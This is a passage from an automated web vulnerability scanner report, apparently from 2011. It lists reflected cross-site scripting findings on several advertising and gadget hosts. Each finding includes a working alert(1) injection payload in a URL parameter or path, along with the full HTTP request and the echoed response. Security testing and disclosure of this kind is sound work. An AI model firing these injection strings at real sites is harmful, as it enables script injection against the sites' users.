GET /serve/fb/adtag.js?clicktrack=http://ib.adnxs.com/click%3FQZ4S5ClBA0CLbOf7qfEAQAAAAAAAAPg_KVyPwvUoDEAAAAAAAAAQQIcXbYK40jx0cEeI8W8QIlk54mJOAAAAALdLAABlAQAA2AMAAAIAAACjbggAPWQAAAEAAABVU0QAVVNEANgCWgAPHBcC3Q4BAgUCAQQAAAAAAh34QwAAAAA./cnd=!BQXSKQjykwgQo90hGL3IASAA/referrer=http%253A%252F%252Fwww.ndtv.com%252Farticle%252Findia%252Fturkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917/clickenc=http%253A%252F%252Fbid.openx.net%252Fclick%253Fcd%253DH4sIAAAAAAAAABXLuQ3DMAwF0O9cEOA13BIgLYqSiqyQHXQCKTOBx3SfSYK8_q1YAGxjiIqESbanRNp2ozS9kY0QA3senqvD5VW_ecX1PziMUjxnMu1KjUuk7jVTbVKlW-oSp8MNiE-HO5bzcHgAnzd-lT2113MAAAA%253D%2526dst%253D&tid=68324&type=lead&1781d"-alert(1)-"f40f9a0d3a9=1 HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1315097285_34021:68285:1:0:0_34024:68283:2:234:326_34024:68292:2:119122:119204_34023:68293:1:119835:119835; uid=1_1315097285_1314893682667:5756480826433243; kwd=1_1315097285; scg=1_1315097285; ppd=1_1315097285; act=1_1315097285

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:29:29 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315106969_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 03:29:29 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 03:29:29 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 848

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?clicktrack=http://ib.adnxs.com/click%3FQZ4S5ClBA0CLbOf7qfEAQAAAAAAAAPg_KVyPwvUoDEAAAAAAAAAQQIcXbYK40jx0cEeI8W8QIlk54mJOAAAAALdLAAB
...[SNIP]...
4sIAAAAAAAAABXLuQ3DMAwF0O9cEOA13BIgLYqSiqyQHXQCKTOBx3SfSYK8_q1YAGxjiIqESbanRNp2ozS9kY0QA3senqvD5VW_ecX1PziMUjxnMu1KjUuk7jVTbVKlW-oSp8MNiE-HO5bzcHgAnzd-lT2113MAAAA%253D%2526dst%253D&tid=68324&type=lead&1781d"-alert(1)-"f40f9a0d3a9=1' width='728' height='90' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

6.126. http://imp.fetchback.com/serve/fb/adtag.js [type parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imp.fetchback.com
Path:	/serve/fb/adtag.js

Issue detail

The value of the type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 371ae"-alert(1)-"00f549dcd was submitted in the type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /serve/fb/adtag.js?clicktrack=http://ib.adnxs.com/click%3FQZ4S5ClBA0CLbOf7qfEAQAAAAAAAAPg_KVyPwvUoDEAAAAAAAAAQQIcXbYK40jx0cEeI8W8QIlk54mJOAAAAALdLAABlAQAA2AMAAAIAAACjbggAPWQAAAEAAABVU0QAVVNEANgCWgAPHBcC3Q4BAgUCAQQAAAAAAh34QwAAAAA./cnd=!BQXSKQjykwgQo90hGL3IASAA/referrer=http%253A%252F%252Fwww.ndtv.com%252Farticle%252Findia%252Fturkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917/clickenc=http%253A%252F%252Fbid.openx.net%252Fclick%253Fcd%253DH4sIAAAAAAAAABXLuQ3DMAwF0O9cEOA13BIgLYqSiqyQHXQCKTOBx3SfSYK8_q1YAGxjiIqESbanRNp2ozS9kY0QA3senqvD5VW_ecX1PziMUjxnMu1KjUuk7jVTbVKlW-oSp8MNiE-HO5bzcHgAnzd-lT2113MAAAA%253D%2526dst%253D&tid=68324&type=lead371ae"-alert(1)-"00f549dcd HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1315097285_34021:68285:1:0:0_34024:68283:2:234:326_34024:68292:2:119122:119204_34023:68293:1:119835:119835; uid=1_1315097285_1314893682667:5756480826433243; kwd=1_1315097285; scg=1_1315097285; ppd=1_1315097285; act=1_1315097285

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:29:15 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315106955_1314893682667:57564808264332436; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 03:29:15 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 03:29:15 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 843

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?clicktrack=http://ib.adnxs.com/click%3FQZ4S5ClBA0CLbOf7qfEAQAAAAAAAAPg_KVyPwvUoDEAAAAAAAAAQQIcXbYK40jx0cEeI8W8QIlk54mJOAAAAALdLAAB
...[SNIP]...
H4sIAAAAAAAAABXLuQ3DMAwF0O9cEOA13BIgLYqSiqyQHXQCKTOBx3SfSYK8_q1YAGxjiIqESbanRNp2ozS9kY0QA3senqvD5VW_ecX1PziMUjxnMu1KjUuk7jVTbVKlW-oSp8MNiE-HO5bzcHgAnzd-lT2113MAAAA%253D%2526dst%253D&tid=68324&type=lead371ae"-alert(1)-"00f549dcd' width='728' height='90' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

6.127. http://mc8tdi0ripmbpds25eboaupdulritrp6-a-fc-opensocial.googleusercontent.com/gadgets/ifr [url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mc8tdi0ripmbpds25eboaupdulritrp6-a-fc-opensocial.googleusercontent.com
Path:	/gadgets/ifr

Issue detail

The value of the url request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c391a%3balert(1)//4913b697698 was submitted in the url parameter. This input was echoed as c391a;alert(1)//4913b697698 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /gadgets/ifr?url=c391a%3balert(1)//4913b697698&container=peoplesense&parent=http://social.ndtv.com/&mid=0&view=profile&d=0.560.7&lang=en&communityId=08392118198779617194&caller=http://social.ndtv.com/static/Comment/Form/?%26key%3Dae42a4f016dd1fdd208110a097b061a4%26link%3Dhttp%253A%252F%252Fwww.ndtv.com%252Farticle%252Findia%252F48-hours-on-mumbai-airport-s-main-runway-still-shut-131142%26title%3D48%2Bhours%2Bon%252C%2BMumbai%2Bairport%2527s%2Bmain%2Brunway%2Bstill%2Bshut%26ctype%3Dstory%26identifier%3Dstory-131142 HTTP/1.1
Host: mc8tdi0ripmbpds25eboaupdulritrp6-a-fc-opensocial.googleusercontent.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 502 Bad Gateway
P3P: CP="CAO PSA OUR"
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 02:45:26 GMT
Expires: Sun, 04 Sep 2011 02:45:26 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 71
Server: GSE

Unable to retrieve spec for c391a;alert(1)//4913b697698. HTTP error 502

6.128. http://mc8tdi0ripmbpds25eboaupdulritrp6-a-fc-opensocial.googleusercontent.com/gadgets/ifr [url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mc8tdi0ripmbpds25eboaupdulritrp6-a-fc-opensocial.googleusercontent.com
Path:	/gadgets/ifr

Issue detail

The value of the url request parameter is copied into a JavaScript rest-of-line comment. The payload 75ccb%0aalert(1)//22ed514ee17 was submitted in the url parameter. This input was echoed as 75ccb
alert(1)//22ed514ee17 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /gadgets/ifr?url=http://www.google.com/friendconnect/gadgets/osapi-0.8.xml75ccb%0aalert(1)//22ed514ee17&container=peoplesense&parent=http://social.ndtv.com/&mid=0&view=profile&d=0.560.7&lang=en&communityId=08392118198779617194&caller=http://social.ndtv.com/static/Comment/Form/?%26key%3Dae42a4f016dd1fdd208110a097b061a4%26link%3Dhttp%253A%252F%252Fwww.ndtv.com%252Farticle%252Findia%252F48-hours-on-mumbai-airport-s-main-runway-still-shut-131142%26title%3D48%2Bhours%2Bon%252C%2BMumbai%2Bairport%2527s%2Bmain%2Brunway%2Bstill%2Bshut%26ctype%3Dstory%26identifier%3Dstory-131142 HTTP/1.1
Host: mc8tdi0ripmbpds25eboaupdulritrp6-a-fc-opensocial.googleusercontent.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 400 Bad Request
P3P: CP="CAO PSA OUR"
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 02:45:29 GMT
Expires: Sun, 04 Sep 2011 02:45:29 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 128
Server: GSE

Unable to retrieve spec for http://www.google.com/friendconnect/gadgets/osapi-0.8.xml75ccb
alert(1)//22ed514ee17. HTTP error 400

Summary

Severity:	High
Confidence:	Certain
Host:	http://msite.martiniadnetwork.com
Path:	/action/track/type/0/pid/1000000986802/sid/1000005169510/loc/http:/www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917/pubclick/Martini/Openx_05182011_ron__051811_260/pos/Top/page/ndtv.com/ROS/L12/ord/1737249030

6.133. http://msite.martiniadnetwork.com/index/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://msite.martiniadnetwork.com
Path:	/index/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a3c32<script>alert(1)</script>92183ca25d0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /indexa3c32<script>alert(1)</script>92183ca25d0/?pid=1000000986802&sid=1000005169510&loc=http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2F48-hours-on-mumbai-airports-main-runway-still-shut-131142&rnd=733840892&ref=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dbangkok%2Bthailand%2Bnews%23sclient%3Dpsy%26hl%3Den%26source%3Dhp%26q%3Dmumbay%2Bnews%26pbx%3D1%26oq%3Dmumbay%2Bnews%26aq%3Df%26aqi%3Dg-c5%26aql%3D%26gs_sm%3De%26gs_upl%3D32342l36076l0l37100l8l7l1l0l0l4l1052l4032l3-1.1.1.2.1l6l0%26bav%3Don.2%2Cor.r_gc.r_pw. HTTP/1.1
Host: msite.martiniadnetwork.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:41:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Cache-Control: max-age=15552000
Expires: Fri, 02 Mar 2012 02:41:25 GMT
Vary: Accept-Encoding
Content-Length: 465
Content-Type: text/html

<pre>exception 'CHttpException' with message 'Unable to resolve the request "indexa3c32<script>alert(1)</script>92183ca25d0".' in /home/library/framework/web/CWebApplication.php:281
Stack trace:
#0 /home/library/framework/web/CWebApplication.php(136): CWebApplication->
...[SNIP]...

6.134. http://msite.martiniadnetwork.com/index/ [pid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://msite.martiniadnetwork.com
Path:	/index/

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f698'%3balert(1)//e00053b0c8a was submitted in the pid parameter. This input was echoed as 4f698';alert(1)//e00053b0c8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /index/?pid=10000009868024f698'%3balert(1)//e00053b0c8a&sid=1000005169510&loc=http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2F48-hours-on-mumbai-airports-main-runway-still-shut-131142&rnd=733840892&ref=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dbangkok%2Bthailand%2Bnews%23sclient%3Dpsy%26hl%3Den%26source%3Dhp%26q%3Dmumbay%2Bnews%26pbx%3D1%26oq%3Dmumbay%2Bnews%26aq%3Df%26aqi%3Dg-c5%26aql%3D%26gs_sm%3De%26gs_upl%3D32342l36076l0l37100l8l7l1l0l0l4l1052l4032l3-1.1.1.2.1l6l0%26bav%3Don.2%2Cor.r_gc.r_pw. HTTP/1.1
Host: msite.martiniadnetwork.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:35:27 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Set-Cookie: MMNBASEID=21051315103139790868608; expires=Fri, 02-Mar-2012 02:35:28 GMT; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: OptOut=no; expires=Fri, 02-Mar-2012 02:35:28 GMT; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: MMNBASEVAL=n4TdBlRhNZdsrexENFpuoLQ2lY291DhPmCSkzHjtIJhIrlKBMcY4SLfbQLI%2B1gsyRBTho8GvtoJ9h5Hwz9Z6xvZsyeQqgfaDMiPYESAYM3VZnxngJflPyn6ZBQF0P2QKN7DpGr1qCZr0OLQFtPLugmQXwzZMvzajjpFbYg%3D%3D; expires=Fri, 02-Mar-2012 02:35:28 GMT; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: MMNATTR=ujBzvI%2Fu3oiZfVMCEKQUy3C4XM8EJTl1Z2Q9F8sYcv188dxFIQ06j54f6sauInBPIEys313s8SDaa987qAXlyQaYlrgvdQmxq2cIzxjuVkrjmKeodTxAgPvtU9%2F%2BppLudzcYW2co8GI66npQrwgwF%2FAddmqpwhjW2c74a1dmtsN1monDJqFmR%2BmMvidhUFtzRBYOG2qWaKwKWHzVoSUWF0PP6UN%2BYKARjRNwA8xuM1IdJgfxwphdRdyESI25aMIUPFY5kAFSbFHhuCsKAHh9V1J37qs13vTF5ObI%2BR1%2FFmO3SkYnYwQBpS2haOk9lnKjZaMHmHQ9jcC713hYmeiatinXKSAPK2h9utKSacvDyFpKeJycIJt2rvferiRxmCEMpxRVjUcny3rv; expires=Fri, 02-Mar-2012 02:35:28 GMT; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: MMNSESSID=26de56d01ed956f4e7a3da4fd1dea473; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: MMNSESSIDC=22; path=/; domain=.martiniadnetwork.com; httponly
Cache-Control: max-age=15552000
Expires: Fri, 02 Mar 2012 02:35:27 GMT
Vary: Accept-Encoding
Content-Length: 1347
Content-Type: text/html

var OAS_taxonomy = 'muid=21051315103139790868608';
var OAS_pubclick = 'http://msite.martiniadnetwork.com/action/track/type/0/pid/10000009868024f698';alert(1)//e00053b0c8a/sid/1000005169510/loc/http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2F48-hours-on-mumbai-airports-main-runway-still-shut-131142%2F';
OAS_pubclick = OAS_pubclick + '/pubclick/' + MMI_ClickURL;
var OAS_
...[SNIP]...

6.135. http://msite.martiniadnetwork.com/index/ [sid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://msite.martiniadnetwork.com
Path:	/index/

Issue detail

The value of the sid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9bd74'%3balert(1)//fb3f90f9c4c was submitted in the sid parameter. This input was echoed as 9bd74';alert(1)//fb3f90f9c4c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /index/?pid=1000000986802&sid=10000051695109bd74'%3balert(1)//fb3f90f9c4c&loc=http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2F48-hours-on-mumbai-airports-main-runway-still-shut-131142&rnd=733840892&ref=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dbangkok%2Bthailand%2Bnews%23sclient%3Dpsy%26hl%3Den%26source%3Dhp%26q%3Dmumbay%2Bnews%26pbx%3D1%26oq%3Dmumbay%2Bnews%26aq%3Df%26aqi%3Dg-c5%26aql%3D%26gs_sm%3De%26gs_upl%3D32342l36076l0l37100l8l7l1l0l0l4l1052l4032l3-1.1.1.2.1l6l0%26bav%3Don.2%2Cor.r_gc.r_pw. HTTP/1.1
Host: msite.martiniadnetwork.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:37:10 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Set-Cookie: MMNBASEID=21051315103139790868608; expires=Fri, 02-Mar-2012 02:37:11 GMT; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: OptOut=no; expires=Fri, 02-Mar-2012 02:37:11 GMT; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: MMNBASEVAL=4oFB%2BXGtOGAkXp4WPWC8TdCDVQ6m6FRuP%2FMase%2BzCOisFEhevd%2Brrw%2FQ9fOrLyKwGSuxfHLzZM0mRqaEmaJblkrKyNpmenaFqT145wvU%2Fj22lmlpedZw6FlID%2BOBW%2FHTkIQMrQo%2B3b2NZo4y5AyAB8Q5qblQgerGcBTmyg%3D%3D; expires=Fri, 02-Mar-2012 02:37:11 GMT; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: MMNATTR=HXtQ0pfNkJ1c4mX6vgZcp8f66noqZiUcvjvHUPvSNUk2F5wUpX4oe5LYJusJZBlGEY8uSSoQdermwgdXfUXtMFyu5OF%2FctPzwqfQNBKlaQD3xlXwKdpPgocglRLh%2F0eOJApuk2TK739B%2Bg50BGHKb62pvu6LDIWnndQzge1bS9RDQC0ANcKCiZ6xJvTCfca0nNNuDCgqEXtG1XxlfrBXx1g8OH8jJWq4g9UOglHpYRsTmtPoMh5NqJ6jWagBNLpYffmM1aVyEtu58KM6xoytbqGNPyplpT9ICVrZh61t7fVltmDDTuSy7u1sWOQwkIZTlgC0PoTN968c2vj%2F0Ct9DlISu2gQIj%2FCITwsOHyj8OHZXIfdNdpsbKNwDNXlyvJF9BdFxDRL%2BvmA; expires=Fri, 02-Mar-2012 02:37:11 GMT; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: MMNSESSID=26de56d01ed956f4e7a3da4fd1dea473; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: MMNSESSIDC=56; path=/; domain=.martiniadnetwork.com; httponly
Cache-Control: max-age=15552000
Expires: Fri, 02 Mar 2012 02:37:10 GMT
Vary: Accept-Encoding
Content-Length: 1347
Content-Type: text/html

var OAS_taxonomy = 'muid=21051315103139790868608';
var OAS_pubclick = 'http://msite.martiniadnetwork.com/action/track/type/0/pid/1000000986802/sid/10000051695109bd74';alert(1)//fb3f90f9c4c/loc/http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2F48-hours-on-mumbai-airports-main-runway-still-shut-131142%2F';
OAS_pubclick = OAS_pubclick + '/pubclick/' + MMI_ClickURL;
var OAS_searchterms = '';
...[SNIP]...

6.136. http://nai.ad.us-ec.adtechus.com/nai/daa.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://nai.ad.us-ec.adtechus.com
Path:	/nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 392cc"-alert(1)-"5afc7ba6df5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /nai392cc"-alert(1)-"5afc7ba6df5/daa.php?action_id=3&participant_id=4&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675 HTTP/1.1
Host: nai.ad.us-ec.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:10:25 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:10:25 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai392cc"-alert(1)-"5afc7ba6df5/daa.php?action_id=3&participant_id=4&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName
...[SNIP]...

6.137. http://nai.ad.us-ec.adtechus.com/nai/daa.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://nai.ad.us-ec.adtechus.com
Path:	/nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7afbb"-alert(1)-"61bebf5c956 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /nai/daa.php7afbb"-alert(1)-"61bebf5c956?action_id=3&participant_id=4&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675 HTTP/1.1
Host: nai.ad.us-ec.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:11:53 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:11:53 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
lamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai/daa.php7afbb"-alert(1)-"61bebf5c956?action_id=3&participant_id=4&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
...[SNIP]...

6.138. http://nai.adserver.adtechus.com/nai/daa.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://nai.adserver.adtechus.com
Path:	/nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 119b2"-alert(1)-"b52d5d9fc25 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /nai119b2"-alert(1)-"b52d5d9fc25/daa.php?action_id=3&participant_id=5&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675 HTTP/1.1
Host: nai.adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4E5FAC086E651A4418BD90FFF001676A

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:11:06 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:11:06 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

